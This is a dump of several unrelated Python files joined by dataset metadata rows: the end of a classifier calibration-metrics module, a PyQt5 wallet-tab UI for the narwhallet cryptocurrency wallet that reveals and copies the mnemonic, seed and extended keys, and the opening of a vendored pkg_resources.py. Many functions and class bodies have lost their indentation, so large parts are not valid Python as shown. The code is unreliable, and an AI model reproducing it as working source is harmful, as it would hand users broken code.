    pred_class = np.argmax(probabilities, axis=1)  # predicted label
    # NOTE(review): the keyword arguments look swapped, but this orients the
    # matrix with rows indexed by the *predicted* class (and columns by the
    # true label), matching the TF version — confirm intent before changing.
    confusion_matrix = sklearn_cm(y_pred=labels, y_true=pred_class,
                                  labels=np.arange(nlabels))
    # dist_weights[k]: fraction of examples whose prediction is class k.
    dist_weights = np.sum(confusion_matrix, axis=1)
    dist_weights = dist_weights / np.sum(dist_weights)
    # pbar: empirical marginal distribution over true labels.
    pbar = np.sum(confusion_matrix, axis=0)
    pbar = pbar / np.sum(pbar)
    # dist_mean[k, :]: empirical label distribution among examples predicted
    # as class k; the epsilon guards against empty rows.
    dist_mean = confusion_matrix / np.expand_dims(np.sum(confusion_matrix, axis=1) + 1.0e-7, 1)
    # Uncertainty: negative quadratic entropy of the marginal distribution.
    uncertainty = -np.sum(pbar ** 2)
    # Resolution: expected quadratic divergence of per-bin means from pbar.
    resolution = (np.expand_dims(pbar, 1) - dist_mean) ** 2
    resolution = np.sum(dist_weights * np.sum(resolution, axis=1))
    # Reliability: expected quadratic divergence of each prediction from the
    # empirical distribution of its bin.
    prob_true = dist_mean[pred_class]
    reliability = np.sum((prob_true - probabilities) ** 2, axis=1)
    reliability = np.mean(reliability)
    return uncertainty, resolution, reliability
def nll(probs):
    """Negative log-likelihood of the highest-probability predictions.

    Note: this scores the *predicted* class (the max probability of each
    row); no ground-truth labels are taken.

    Args:
      probs: [num_samples, num_class]

    Returns:
      Scalar: -sum(log(max_prob + 1e-8)) over all samples.
    """
    top = probs.max(axis=-1)
    return -np.sum(np.log(top + 1e-8))
def soften_probabilities(probs, epsilon=1e-8):
    """Heavily weighted average of a categorical distribution and uniform.

    Args:
      probs: Categorical probabilities of shape [num_samples, num_classes].
      epsilon: Small positive weight given to the uniform distribution.

    Returns:
      epsilon * uniform + (1 - epsilon) * probs
    """
    num_classes = probs.shape[-1]
    uniform = np.ones_like(probs) / num_classes
    return (1 - epsilon) * probs + epsilon * uniform
def get_quantile_bins(num_bins, probs, top_k=1):
    """Find quantile bin edges.

    Args:
      num_bins: int, number of bins desired.
      probs: Categorical probabilities of shape [num_samples, num_classes].
      top_k: int, number of highest-predicted classes to consider in binning.

    Returns:
      Numpy vector of num_bins + 1 quantile bin edges; the outer edges are
      clamped to 0 and 1.
    """
    edge_percentiles = np.linspace(0, 100, num_bins + 1)
    # Binary case given as a 1-D vector: expand to two explicit columns.
    if probs.ndim == 1:
        probs = np.stack([probs, 1 - probs]).T
    if top_k == 1:
        top_scores = probs.max(-1)
    else:
        placeholder_labels = np.zeros(probs.shape[0]).astype(np.int32)
        top_scores, _ = _filter_top_k(probs, placeholder_labels, top_k)
    bins = np.percentile(top_scores, edge_percentiles)
    # Force the outer edges to span the full probability range.
    bins[0], bins[-1] = 0., 1.
    return bins
def _validate_probabilities(probabilities, multiclass=False):
if np.max(probabilities) > 1. or np.min(probabilities) < 0.:
raise ValueError('All probabilities must be in [0,1].')
if multiclass and not np.allclose(1, np.sum(probabilities, axis=-1),
atol=1e-5):
raise ValueError(
'Multiclass probabilities must sum to 1 along the last dimension.')
def _check_rank_nonempty(rank, **kwargs):
for key, array in six.iteritems(kwargs):
if len(array) <= 1 or array.ndim != rank:
raise ValueError(
'%s must be a rank-1 array of length > 1; actual shape is %s.' %
(key, array.shape))
# def _make_flatten_unflatten_fns(batch_shape):
# """Builds functions for flattening and unflattening batch dimensions."""
# batch_shape = tuple(batch_shape)
# batch_rank = len(batch_shape)
# ndims = np.prod(batch_shape)
# def flatten_fn(x):
# x_shape = tuple(x.shape)
# if x_shape[:batch_rank] != batch_shape:
# raise ValueError('Expected batch-shape=%s; received array of shape=%s' %
# (batch_shape, x_shape))
# flat_shape = (ndims,) + x_shape[batch_rank:]
# return tf.reshape(x, flat_shape)
# def unflatten_fn(x):
# x_shape = tuple(x.shape)
# if x_shape[0] != ndims:
# raise ValueError('Expected batch-size=%d; received shape=%s' %
# (ndims, x_shape))
# return tf.reshape(x, batch_shape + x_shape[1:])
# return flatten_fn, unflatten_fn
| 41.292111 | 95 | 0.682123 |
48cc149dbaf04b7b3ba58856edbfbb9a0dc105c2 | 21,595 | py | Python | narwhallet/core/kui/ux/wallets_tab.py | Snider/narwhallet | 0d528763c735f1e68b8264e302854d41e7cf1956 | [
"MIT"
] | 3 | 2021-12-29T11:25:13.000Z | 2022-01-16T13:57:17.000Z | narwhallet/core/kui/ux/wallets_tab.py | Snider/narwhallet | 0d528763c735f1e68b8264e302854d41e7cf1956 | [
"MIT"
] | null | null | null | narwhallet/core/kui/ux/wallets_tab.py | Snider/narwhallet | 0d528763c735f1e68b8264e302854d41e7cf1956 | [
"MIT"
] | 1 | 2022-01-16T13:57:20.000Z | 2022-01-16T13:57:20.000Z | from PyQt5 import QtCore
from PyQt5.QtGui import QIcon, QPixmap
from PyQt5.QtCore import QObject
from PyQt5.QtWidgets import (QWidget, QVBoxLayout, QFrame, QHBoxLayout,
QLabel, QSpacerItem, QSizePolicy, QPushButton,
QPlainTextEdit, QScrollArea, QSplitter,
QTabWidget)
from narwhallet.control.shared import MShared
from narwhallet.core.kui.ux.widgets import (_transaction_table,
_wallets_addr_tbl,
_wallets_table)
from narwhallet.core.kcl.wallet.wallet import MWallet
class Ui_WalletTab(QObject):
def setupUi(self):
_sp_exp = QSizePolicy.Policy.Expanding
_sp_min = QSizePolicy.Policy.Minimum
_sp_minexp = QSizePolicy.Policy.MinimumExpanding
_transm_st = QtCore.Qt.TransformationMode.SmoothTransformation
self.tabWallets = QWidget()
self.verticalLayout_3 = QVBoxLayout(self.tabWallets)
self.frame_3 = QFrame(self.tabWallets)
self.horizontalLayout_3 = QHBoxLayout(self.frame_3)
self.btn_send = QPushButton(self.frame_3)
self.btn_create = QPushButton(self.frame_3)
self.btn_restore = QPushButton(self.frame_3)
self.btn_watch = QPushButton(self.frame_3)
self.tbl_w = _wallets_table('tbl_w', self.tabWallets)
self.tabWidget_2 = QTabWidget(self.tabWallets)
self.tabTransactions = QWidget()
self.verticalLayout_4 = QVBoxLayout(self.tabTransactions)
self.tbl_tx = _transaction_table('tbl_tx', self.tabTransactions)
self.tabAddresses = QWidget()
self.verticalLayout_5 = QVBoxLayout(self.tabAddresses)
self.frame_4 = QFrame(self.tabAddresses)
self.horizontalLayout_4 = QHBoxLayout(self.frame_4)
self.btn_watch_addr = QPushButton(self.frame_4)
self.btn_addr = QPushButton(self.frame_4)
self.tbl_addr = _wallets_addr_tbl('tbl_addr', self.tabAddresses)
self.tabIntAddresses = QWidget()
self.verticalLayout_7 = QVBoxLayout(self.tabIntAddresses)
self.frame_7 = QFrame(self.tabIntAddresses)
self.horizontalLayout_7 = QHBoxLayout(self.frame_7)
self.btn_addr2 = QPushButton(self.frame_7)
self.tbl_addr2 = _wallets_addr_tbl('tbl_addr',
self.tabIntAddresses)
self._ppic = QPixmap(MShared.get_resource_path('plus.png'))
self._mpic = QPixmap(MShared.get_resource_path('minus.png'))
self._bpic = QPixmap(MShared.get_resource_path('clipboard.png'))
self._bpic = self._bpic.scaledToWidth(20, _transm_st)
self.tabWalletSettings = QWidget()
self.root_vl = QVBoxLayout(self.tabWalletSettings)
self.frame_info = QFrame(self.tabWalletSettings)
self.frame_vl = QVBoxLayout(self.frame_info)
self.hl0 = QHBoxLayout()
self.lwname = QLabel(self.frame_info)
self.wname = QLabel(self.frame_info)
self.hl1 = QHBoxLayout()
self.hl1a = QHBoxLayout()
self.lwmnemonic = QLabel(self.frame_info)
self.llwmnemonic = QPushButton(self.frame_info)
self.cpmnemonic = QPushButton(self.frame_info)
self.wmnemonic = QPlainTextEdit(self.frame_info)
self.hl2 = QHBoxLayout()
self.hl2a = QHBoxLayout()
self.lwseed = QLabel(self.frame_info)
self.llwseed = QPushButton(self.frame_info)
self.cpseed = QPushButton(self.frame_info)
self.wseed = QPlainTextEdit(self.frame_info)
self.hl14 = QHBoxLayout()
self.hl14a = QHBoxLayout()
self.lxprv = QLabel(self.frame_info)
self.llxprv = QPushButton(self.frame_info)
self.cpxprv = QPushButton(self.frame_info)
self.wxprv = QPlainTextEdit(self.frame_info)
self.hl15 = QHBoxLayout()
self.hl15a = QHBoxLayout()
self.lxpub = QLabel(self.frame_info)
self.llxpub = QPushButton(self.frame_info)
self.cpxpub = QPushButton(self.frame_info)
self.wxpub = QPlainTextEdit(self.frame_info)
self.hl3 = QHBoxLayout()
self.lwcoin = QLabel(self.frame_info)
self.wcoin = QLabel(self.frame_info)
# self.hl4 = QHBoxLayout()
# self.lwbip = QLabel(self.frame_info)
# self.wbip = QLabel(self.frame_info)
self.hl5 = QHBoxLayout()
self.lwkind = QLabel(self.frame_info)
self.wkind = QLabel(self.frame_info)
self.hl6 = QHBoxLayout()
self.lwaccount_index = QLabel(self.frame_info)
self.waccount_index = QLabel(self.frame_info)
self.hl7 = QHBoxLayout()
self.lwchange_index = QLabel(self.frame_info)
self.wchange_index = QLabel(self.frame_info)
self.hl8 = QHBoxLayout()
self.lwbalance = QLabel(self.frame_info)
self.wbalance = QLabel(self.frame_info)
self.hl9 = QHBoxLayout()
self.lwlocked = QLabel(self.frame_info)
self.wlocked = QLabel(self.frame_info)
self.hl10 = QHBoxLayout()
self.lwlast_updated = QLabel(self.frame_info)
self.wlast_updated = QLabel(self.frame_info)
self.info_scroll = QScrollArea(self.tabWalletSettings)
splitter_main = QSplitter(QtCore.Qt.Orientation.Vertical)
self.tabWallets.setObjectName('tabWallets')
self.frame_3.setFrameShape(QFrame.Shape.StyledPanel)
self.frame_3.setFrameShadow(QFrame.Shadow.Raised)
self.frame_4.setFrameShape(QFrame.Shape.StyledPanel)
self.frame_4.setFrameShadow(QFrame.Shadow.Raised)
self.btn_watch_addr.setVisible(False)
self.frame_7.setFrameShape(QFrame.Shape.StyledPanel)
self.frame_7.setFrameShadow(QFrame.Shadow.Raised)
self._ppic = self._ppic.scaledToWidth(15, _transm_st)
self._mpic = self._mpic.scaledToWidth(15, _transm_st)
self.frame_info.setFrameShape(QFrame.Shape.StyledPanel)
self.frame_info.setFrameShadow(QFrame.Shadow.Raised)
self.wmnemonic.setMaximumHeight(65)
self.wmnemonic.setVisible(False)
self.wmnemonic.setReadOnly(True)
self.cpmnemonic.setVisible(False)
self.cpmnemonic.setIcon(QIcon(self._bpic))
self.cpmnemonic.setFlat(True)
self.cpmnemonic.setToolTip('Copy Mnemonic to Clipboard')
self.llwmnemonic.setIcon(QIcon(self._ppic))
self.llwmnemonic.setFlat(True)
self.llwmnemonic.setToolTip('Show Mnemonic')
self.wseed.setMaximumHeight(65)
self.wseed.setVisible(False)
self.wseed.setReadOnly(True)
self.cpseed.setVisible(False)
self.cpseed.setIcon(QIcon(self._bpic))
self.cpseed.setFlat(True)
self.cpseed.setToolTip('Copy Seed to Clipboard')
self.llwseed.setIcon(QIcon(self._ppic))
self.llwseed.setFlat(True)
self.llwseed.setToolTip('Show Seed')
self.wxprv.setMaximumHeight(65)
self.wxprv.setVisible(False)
self.wxprv.setReadOnly(True)
self.cpxprv.setVisible(False)
self.cpxprv.setIcon(QIcon(self._bpic))
self.cpxprv.setFlat(True)
self.cpxprv.setToolTip('Copy xprv to Clipboard')
self.llxprv.setIcon(QIcon(self._ppic))
self.llxprv.setFlat(True)
self.llxprv.setToolTip('Show xprv')
self.wxpub.setMaximumHeight(65)
self.wxpub.setVisible(False)
self.wxpub.setReadOnly(True)
self.cpxpub.setVisible(False)
self.cpxpub.setIcon(QIcon(self._bpic))
self.cpxpub.setFlat(True)
self.cpxprv.setToolTip('Copy xpub to Clipboard')
self.llxpub.setIcon(QIcon(self._ppic))
self.llxpub.setFlat(True)
self.llxpub.setToolTip('Show xpub')
self.info_scroll.setWidget(self.frame_info)
self.info_scroll.setWidgetResizable(True)
splitter_main.setStretchFactor(1, 1)
self.horizontalLayout_3.addWidget(self.btn_send)
self.horizontalLayout_3.addItem(QSpacerItem(40, 20, _sp_exp, _sp_min))
self.horizontalLayout_3.addWidget(self.btn_create)
self.horizontalLayout_3.addWidget(self.btn_restore)
self.horizontalLayout_3.addWidget(self.btn_watch)
self.verticalLayout_3.addWidget(self.frame_3)
self.verticalLayout_4.addWidget(self.tbl_tx)
self.tabWidget_2.addTab(self.tabTransactions, '')
self.horizontalLayout_4.addItem(QSpacerItem(40, 20, _sp_exp, _sp_min))
self.horizontalLayout_4.addWidget(self.btn_watch_addr)
self.horizontalLayout_4.addWidget(self.btn_addr)
self.verticalLayout_5.addWidget(self.tbl_addr)
self.verticalLayout_5.addWidget(self.frame_4)
self.tabWidget_2.addTab(self.tabAddresses, '')
self.horizontalLayout_7.addItem(QSpacerItem(40, 20, _sp_exp, _sp_min))
self.horizontalLayout_7.addWidget(self.btn_addr2)
self.verticalLayout_7.addWidget(self.tbl_addr2)
self.verticalLayout_7.addWidget(self.frame_7)
self.tabWidget_2.addTab(self.tabIntAddresses, '')
self.tabWidget_2.addTab(self.tabWalletSettings, '')
self.hl0.addWidget(self.lwname)
self.hl0.addWidget(self.wname)
self.hl0.addItem(QSpacerItem(0, 0, _sp_exp, _sp_min))
self.frame_vl.addLayout(self.hl0)
self.hl1.addWidget(self.lwmnemonic)
self.hl1.addWidget(self.llwmnemonic)
self.hl1.addItem(QSpacerItem(0, 0, _sp_minexp, _sp_min))
self.frame_vl.addLayout(self.hl1)
self.hl1a.addWidget(self.cpmnemonic)
self.hl1a.addWidget(self.wmnemonic)
self.frame_vl.addLayout(self.hl1a)
self.hl2.addWidget(self.lwseed)
self.hl2.addWidget(self.llwseed)
self.hl2.addItem(QSpacerItem(0, 0, _sp_minexp, _sp_min))
self.frame_vl.addLayout(self.hl2)
self.hl2a.addWidget(self.cpseed)
self.hl2a.addWidget(self.wseed)
self.frame_vl.addLayout(self.hl2a)
self.hl14.addWidget(self.lxprv)
self.hl14.addWidget(self.llxprv)
self.hl14.addItem(QSpacerItem(0, 0, _sp_minexp, _sp_min))
self.frame_vl.addLayout(self.hl14)
self.hl14a.addWidget(self.cpxprv)
self.hl14a.addWidget(self.wxprv)
self.frame_vl.addLayout(self.hl14a)
self.hl15.addWidget(self.lxpub)
self.hl15.addWidget(self.llxpub)
self.hl15.addItem(QSpacerItem(0, 0, _sp_minexp, _sp_min))
self.frame_vl.addLayout(self.hl15)
self.hl15a.addWidget(self.cpxpub)
self.hl15a.addWidget(self.wxpub)
self.frame_vl.addLayout(self.hl15a)
self.hl3.addWidget(self.lwcoin)
self.hl3.addWidget(self.wcoin)
self.hl3.addItem(QSpacerItem(40, 20, _sp_exp, _sp_min))
self.frame_vl.addLayout(self.hl3)
# self.hl4.addWidget(self.lwbip)
# self.hl4.addWidget(self.wbip)
# self.hl4.addItem(QSpacerItem(40, 20, _sp_exp, _sp_min))
# self.frame_vl.addLayout(self.hl4)
self.hl5.addWidget(self.lwkind)
self.hl5.addWidget(self.wkind)
self.hl5.addItem(QSpacerItem(40, 20, _sp_exp, _sp_min))
self.frame_vl.addLayout(self.hl5)
self.hl6.addWidget(self.lwaccount_index)
self.hl6.addWidget(self.waccount_index)
self.hl6.addItem(QSpacerItem(40, 20, _sp_exp, _sp_min))
self.frame_vl.addLayout(self.hl6)
self.hl7.addWidget(self.lwchange_index)
self.hl7.addWidget(self.wchange_index)
self.hl7.addItem(QSpacerItem(40, 20, _sp_exp, _sp_min))
self.frame_vl.addLayout(self.hl7)
self.hl8.addWidget(self.lwbalance)
self.hl8.addWidget(self.wbalance)
self.hl8.addItem(QSpacerItem(40, 20, _sp_exp, _sp_min))
self.frame_vl.addLayout(self.hl8)
self.hl9.addWidget(self.lwlocked)
self.hl9.addWidget(self.wlocked)
self.hl9.addItem(QSpacerItem(40, 20, _sp_exp, _sp_min))
self.frame_vl.addLayout(self.hl9)
self.hl10.addWidget(self.lwlast_updated)
self.hl10.addWidget(self.wlast_updated)
self.hl10.addItem(QSpacerItem(40, 20, _sp_exp, _sp_min))
self.frame_vl.addLayout(self.hl10)
self.frame_vl.addItem(QSpacerItem(5, 5, _sp_min, _sp_exp))
self.root_vl.addWidget(self.info_scroll)
splitter_main.addWidget(self.tbl_w)
splitter_main.addWidget(self.tabWidget_2)
splitter_main.setSizes([250, 350])
self.verticalLayout_3.addWidget(splitter_main)
self.tabWidget_2.setCurrentIndex(0)
self.llwmnemonic.clicked.connect(self._display_mnemonic)
self.llwseed.clicked.connect(self._display_seed)
self.llxprv.clicked.connect(self._display_xprv)
self.llxpub.clicked.connect(self._display_xpub)
    def retranslateUi(self):
        """Assign the display text of all widgets via
        QCoreApplication.translate, using the 'tabWallets' context."""
        _translate = QtCore.QCoreApplication.translate
        self.btn_send.setText(_translate('tabWallets', 'Send'))
        self.btn_create.setText(_translate('tabWallets',
                                           'Create'))
        self.btn_restore.setText(_translate('tabWallets',
                                            'Restore'))
        # 'W/O' = watch-only wallet button (see btn_watch usage elsewhere).
        self.btn_watch.setText(_translate('tabWallets', 'W/O'))
        self.tabWidget_2.setTabText(self.tabWidget_2
                                    .indexOf(self.tabTransactions),
                                    _translate('tabWallets', 'Transactions'))
        self.btn_watch_addr.setText(_translate('tabWallets',
                                               'Add Address'))
        self.btn_addr.setText(_translate('tabWallets',
                                         'Increase Pool'))
        self.btn_addr2.setText(_translate('tabWallets',
                                          'Increase Pool'))
        self.tabWidget_2.setTabText(self.tabWidget_2
                                    .indexOf(self.tabIntAddresses),
                                    _translate('tabWallets', 'Change'))
        self.tabWidget_2.setTabText(self.tabWidget_2
                                    .indexOf(self.tabAddresses),
                                    _translate('tabWallets', 'Addresses'))
        self.tabWidget_2.setTabText(self.tabWidget_2
                                    .indexOf(self.tabWalletSettings),
                                    _translate('tabWallets', 'Info'))
        self.lwname.setText(_translate('tabWallets', 'Name:'))
        self.lwmnemonic.setText(_translate('tabWallets', 'Mnemonic:'))
        self.lwseed.setText(_translate('tabWallets', 'Seed:'))
        self.lxprv.setText(_translate('tabWallets', 'xprv:'))
        self.lxpub.setText(_translate('tabWallets', 'xpub:'))
        self.lwcoin.setText(_translate('tabWallets', 'Coin:'))
        self.lwkind.setText(_translate('tabWallets', 'Kind:'))
        # self.lwbip.setText(_translate('tabWallets', 'BIP:'))
        self.lwaccount_index.setText(_translate('tabWallets',
                                                'Account Index:'))
        self.lwchange_index.setText(_translate('tabWallets', 'Change Index:'))
        self.lwbalance.setText(_translate('tabWallets', 'Balance:'))
        self.lwlocked.setText(_translate('tabWallets', 'Locked:'))
        self.lwlast_updated.setText(_translate('tabWallets', 'Last Updated:'))
def _display_mnemonic(self, _event):
if self.wmnemonic.isVisible() is True:
self.wmnemonic.setVisible(False)
self.cpmnemonic.setVisible(False)
self.llwmnemonic.setIcon(QIcon(self._ppic))
self.llwmnemonic.setToolTip('Show Mnemonic')
else:
self.wmnemonic.setVisible(True)
self.cpmnemonic.setVisible(True)
self.llwmnemonic.setIcon(QIcon(self._mpic))
self.llwmnemonic.setToolTip('Hide Mnemonic')
def _display_seed(self, _event):
if self.wseed.isVisible() is True:
self.wseed.setVisible(False)
self.cpseed.setVisible(False)
self.llwseed.setIcon(QIcon(self._ppic))
self.llwseed.setToolTip('Show Seed')
else:
self.wseed.setVisible(True)
self.cpseed.setVisible(True)
self.llwseed.setIcon(QIcon(self._mpic))
self.llwseed.setToolTip('Hide Seed')
def _display_xprv(self, _event):
if self.wxprv.isVisible() is True:
self.wxprv.setVisible(False)
self.cpxprv.setVisible(False)
self.llxprv.setIcon(QIcon(self._ppic))
self.llxprv.setToolTip('Show xprv')
else:
self.wxprv.setVisible(True)
self.cpxprv.setVisible(True)
self.llxprv.setIcon(QIcon(self._mpic))
self.llxprv.setToolTip('Hide xrpv')
def _display_xpub(self, _event):
if self.wxpub.isVisible() is True:
self.wxpub.setVisible(False)
self.cpxpub.setVisible(False)
self.llxpub.setIcon(QIcon(self._ppic))
(self.llxpub
.setToolTip(self.llxpub.toolTip().replace('Hide', 'Show')))
else:
self.wxpub.setVisible(True)
self.cpxpub.setVisible(True)
self.llxpub.setIcon(QIcon(self._mpic))
(self.llxpub
.setToolTip(self.llxpub.toolTip().replace('Show', 'Hide')))
    def set_info_values(self, wallet: MWallet):
        """Populate the Info tab from `wallet`, keeping the secret fields
        (mnemonic/seed/xprv/xpub) collapsed until explicitly revealed."""
        self.wname.setText(wallet.name)
        if wallet.mnemonic is None:
            self.lwmnemonic.setVisible(False)
            self.llwmnemonic.setVisible(False)
            self.wmnemonic.setVisible(False)
            self.cpmnemonic.setVisible(False)
            self.wmnemonic.setPlainText('')
        else:
            self.lwmnemonic.setVisible(True)
            self.llwmnemonic.setVisible(True)
            # Text box and copy button stay hidden until the user clicks
            # the reveal button (_display_mnemonic).
            self.wmnemonic.setVisible(False)
            self.cpmnemonic.setVisible(False)
            self.llwmnemonic.setIcon(QIcon(self._ppic))
            self.wmnemonic.setPlainText(wallet.mnemonic)
        if wallet.seed is None:
            self.llwseed.setVisible(False)
            self.lwseed.setVisible(False)
            self.wseed.setVisible(False)
            self.cpseed.setVisible(False)
            self.wseed.setPlainText('')
        else:
            self.llwseed.setVisible(True)
            self.lwseed.setVisible(True)
            self.wseed.setVisible(False)
            self.cpseed.setVisible(False)
            self.llwseed.setIcon(QIcon(self._ppic))
            self.wseed.setPlainText(wallet.seed)
        wallet.generate_extended_prv()
        if wallet.extended_prv is None:
            self.llxprv.setVisible(False)
            self.lxprv.setVisible(False)
            self.wxprv.setVisible(False)
            self.cpxprv.setVisible(False)
            self.wxprv.setPlainText('')
        else:
            self.llxprv.setVisible(True)
            self.lxprv.setVisible(True)
            self.wxprv.setVisible(False)
            self.cpxprv.setVisible(False)
            self.llxprv.setIcon(QIcon(self._ppic))
            self.wxprv.setPlainText(wallet.extended_prv)
        wallet.generate_extended_pub()
        self.wxpub.setPlainText(wallet.extended_pub)
        # BIP49 wallets use the 'ypub' prefix for extended public keys.
        if wallet.bip == 'bip49':
            self.lxpub.setText('ypub')
            self.cpxpub.setToolTip('Copy ypub to Clipboard')
            self.llxpub.setToolTip('Show ypub')
        self.wcoin.setText(wallet.coin)
        self.wkind.setText(wallet.kind.name)
        # NOTE(review): `wallet.kind` is compared to the int 3 here, yet
        # `.name` is read above, so it appears to be an IntEnum-like value;
        # kind == 3 presumably means watch-only (btn_watch_addr shown,
        # extended keys hidden) -- confirm against MWallet.
        if wallet.kind == 3:
            self.btn_watch_addr.setVisible(True)
            self.btn_addr.setVisible(False)
            self.btn_addr2.setVisible(False)
            self.llxpub.setVisible(False)
            self.lxpub.setVisible(False)
            self.cpxpub.setVisible(False)
            self.wxpub.setVisible(False)
        else:
            self.llxpub.setIcon(QIcon(self._ppic))
            self.btn_watch_addr.setVisible(False)
            self.btn_addr.setVisible(True)
            self.btn_addr2.setVisible(True)
            self.llxpub.setVisible(True)
            self.lxpub.setVisible(True)
            self.cpxpub.setVisible(False)
            self.wxpub.setVisible(False)
        # self.wbip.setText(wallet.bip)
        self.waccount_index.setText(str(wallet.account_index))
        self.wchange_index.setText(str(wallet.change_index))
        self.wbalance.setText(str(wallet.balance))
        if wallet.locked is not None:
            self.wlocked.setText(str(wallet.locked))
        else:
            self.wlocked.setText('False')
        if wallet.last_updated is not None:
            (self.wlast_updated.setText(
                MShared.get_timestamp(wallet.last_updated)[1]))
def reset_info_values(self):
self.wname.setText('')
self.lwmnemonic.setVisible(False)
self.llwmnemonic.setVisible(False)
self.wmnemonic.setVisible(False)
self.cpmnemonic.setVisible(False)
self.wmnemonic.setPlainText('')
self.llwseed.setVisible(False)
self.lwseed.setVisible(False)
self.wseed.setVisible(False)
self.cpseed.setVisible(False)
self.wseed.setPlainText('')
self.llxprv.setVisible(False)
self.lxprv.setVisible(False)
self.wxprv.setVisible(False)
self.cpxprv.setVisible(False)
self.wxpub.setPlainText('')
self.wxprv.setPlainText('')
self.lxpub.setText('ypub')
self.wcoin.setText('')
self.wkind.setText('')
self.btn_watch_addr.setVisible(False)
self.btn_addr.setVisible(False)
self.btn_addr2.setVisible(False)
# self.wbip.setText('')
self.waccount_index.setText('')
self.wchange_index.setText('')
self.wbalance.setText('')
self.wlocked.setText('False')
self.wlast_updated.setText('')
| 45.463158 | 78 | 0.643297 |
aca743a3a610afcbde2f07bdecfdf453f4488a34 | 88,823 | py | Python | shell/pkg_resources.py | suifengzhuliu/impala | 611f4c6f3b18cfcddff3b2956cbb87c295a87655 | [
"Apache-2.0"
] | 1,523 | 2015-01-01T03:42:24.000Z | 2022-02-06T22:24:04.000Z | shell/pkg_resources.py | suifengzhuliu/impala | 611f4c6f3b18cfcddff3b2956cbb87c295a87655 | [
"Apache-2.0"
] | 10 | 2015-01-09T06:46:05.000Z | 2022-03-29T21:57:57.000Z | shell/pkg_resources.py | suifengzhuliu/impala | 611f4c6f3b18cfcddff3b2956cbb87c295a87655 | [
"Apache-2.0"
] | 647 | 2015-01-02T04:01:40.000Z | 2022-03-30T15:57:35.000Z | """
This file is redistributed under the Python Software Foundation License:
http://docs.python.org/2/license.html
"""
"""Package resource API
--------------------
A resource is a logical file contained within a package, or a logical
subdirectory thereof. The package resource API expects resource names
to have their path parts separated with ``/``, *not* whatever the local
path separator is. Do not use os.path operations to manipulate resource
names being passed into the API.
The package resource API is designed to work with normal filesystem packages,
.egg files, and unpacked .egg files. It can also work in a limited way with
.zip files and with custom PEP 302 loaders that support the ``get_data()``
method.
"""
import sys, os, zipimport, time, re, imp, types
from urlparse import urlparse, urlunparse
try:
frozenset
except NameError:
from sets import ImmutableSet as frozenset
# capture these to bypass sandboxing
from os import utime
try:
from os import mkdir, rename, unlink
WRITE_SUPPORT = True
except ImportError:
# no write support, probably under GAE
WRITE_SUPPORT = False
from os import open as os_open
from os.path import isdir, split
# This marker is used to simplify the process that checks is the
# setuptools package was installed by the Setuptools project
# or by the Distribute project, in case Setuptools creates
# a distribution with the same version.
#
# The bootstrapping script for instance, will check if this
# attribute is present to decide wether to reinstall the package
_distribute = True
def _bypass_ensure_directory(name, mode=0777):
    # Sandbox-bypassing version of ensure_directory()
    # Recursively creates the *parent* directory chain of `name` (not `name`
    # itself) using the raw os.mkdir captured at import time, so setuptools'
    # sandboxing hooks are not triggered.  Raises IOError on platforms
    # without write support (see WRITE_SUPPORT above, e.g. GAE).
    # NOTE: `0777` is Python 2 octal syntax; this vendored module targets
    # Python 2.
    if not WRITE_SUPPORT:
        raise IOError('"os.mkdir" not supported on this platform.')
    dirname, filename = split(name)
    # Recurse only when `name` has both a directory part and a final
    # component, and the directory does not already exist.
    if dirname and filename and not isdir(dirname):
        _bypass_ensure_directory(dirname)
        mkdir(dirname, mode)
def get_supported_platform():
    """Return this platform's maximum compatible version.
    distutils.util.get_platform() normally reports the minimum version
    of Mac OS X that would be required to *use* extensions produced by
    distutils. But what we want when checking compatibility is to know the
    version of Mac OS X that we are *running*. To allow usage of packages that
    explicitly require a newer version of Mac OS X, we must also know the
    current version of the OS.
    If this condition occurs for any other platform with a version in its
    platform strings, this function should be extended accordingly.
    """
    plat = get_build_platform()
    m = macosVersionString.match(plat)
    if m is not None and sys.platform == "darwin":
        try:
            running_vers = '.'.join(_macosx_vers()[:2])
            plat = 'macosx-%s-%s' % (running_vers, m.group(3))
        except ValueError:
            pass # not Mac OS X
    return plat
__all__ = [
# Basic resource access and distribution/entry point discovery
'require', 'run_script', 'get_provider', 'get_distribution',
'load_entry_point', 'get_entry_map', 'get_entry_info', 'iter_entry_points',
'resource_string', 'resource_stream', 'resource_filename',
'resource_listdir', 'resource_exists', 'resource_isdir',
# Environmental control
'declare_namespace', 'working_set', 'add_activation_listener',
'find_distributions', 'set_extraction_path', 'cleanup_resources',
'get_default_cache',
# Primary implementation classes
'Environment', 'WorkingSet', 'ResourceManager',
'Distribution', 'Requirement', 'EntryPoint',
# Exceptions
'ResolutionError','VersionConflict','DistributionNotFound','UnknownExtra',
'ExtractionError',
# Parsing functions and string utilities
'parse_requirements', 'parse_version', 'safe_name', 'safe_version',
'get_platform', 'compatible_platforms', 'yield_lines', 'split_sections',
'safe_extra', 'to_filename',
# filesystem utilities
'ensure_directory', 'normalize_path',
# Distribution "precedence" constants
'EGG_DIST', 'BINARY_DIST', 'SOURCE_DIST', 'CHECKOUT_DIST', 'DEVELOP_DIST',
# "Provider" interfaces, implementations, and registration/lookup APIs
'IMetadataProvider', 'IResourceProvider', 'FileMetadata',
'PathMetadata', 'EggMetadata', 'EmptyProvider', 'empty_provider',
'NullProvider', 'EggProvider', 'DefaultProvider', 'ZipProvider',
'register_finder', 'register_namespace_handler', 'register_loader_type',
'fixup_namespace_packages', 'get_importer',
# Deprecated/backward compatibility only
'run_main', 'AvailableDistributions',
]
class ResolutionError(Exception):
    """Abstract base for dependency resolution errors"""
    def __repr__(self):
        # Class name plus the args tuple, e.g. "ResolutionError('x',)".
        return '%s%r' % (self.__class__.__name__, self.args)
class VersionConflict(ResolutionError):
    """An already-installed version conflicts with the requested version"""
    # Raised e.g. by WorkingSet.find() when the active distribution does
    # not satisfy the requested requirement.
class DistributionNotFound(ResolutionError):
    """A requested distribution was not found"""
class UnknownExtra(ResolutionError):
    """Distribution doesn't have an "extra feature" of the given name"""
# Registry mapping PEP 302 loader types to IResourceProvider factories;
# populated via register_loader_type() and consumed by get_provider().
_provider_factories = {}
# Major Python version as a string, e.g. '2.7'.
PY_MAJOR = sys.version[:3]
# Distribution "precedence" constants; the numeric ordering presumably
# ranks how preferable each distribution format is -- confirm against the
# Environment class's usage.
EGG_DIST = 3
BINARY_DIST = 2
SOURCE_DIST = 1
CHECKOUT_DIST = 0
DEVELOP_DIST = -1
def register_loader_type(loader_type, provider_factory):
    """Register `provider_factory` to make providers for `loader_type`
    `loader_type` is the type or class of a PEP 302 ``module.__loader__``,
    and `provider_factory` is a function that, passed a *module* object,
